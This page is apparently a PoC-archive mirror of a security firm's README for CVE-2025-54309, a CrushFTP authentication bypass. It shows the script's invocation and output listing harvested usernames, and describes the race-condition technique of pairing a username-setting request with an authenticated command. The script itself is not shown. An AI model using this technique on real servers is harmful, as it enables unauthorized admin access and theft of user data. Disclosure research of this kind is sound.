Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54309 PoC — CrushFTP 安全漏洞

Source
https://github.com/watchtowrlabs/watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309
Associated Vulnerability
Title:CrushFTP 安全漏洞 (CVE-2025-54309)
Description:CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
Readme

# CVE-2025-54309
A CrushFTP Authentication Bypass Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

```

# Description

This script is a proof of concept for CVE-2025-54309 against CrushFTP Interfaces. By creating a set of race requests sharing the same session identifiers, one request to set the username property to "crushadmin" and one request to execute an authenticated command as this user, its possible in this PoC to extract the list of usernames. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Affected Versions

* before 10.8.5
* 11 before 11.3.4_23

More details at [CrushFTP Advisory](https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File Snapshot

 [4.0K]  /data/pocs/72cfbd00c7e264a42c4e11a8a26b91ca887205bf
├── [2.2K]  README.md
└── [6.5K]  watchTowr-vs-CrushFTP-CVE-2025-54309.py

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →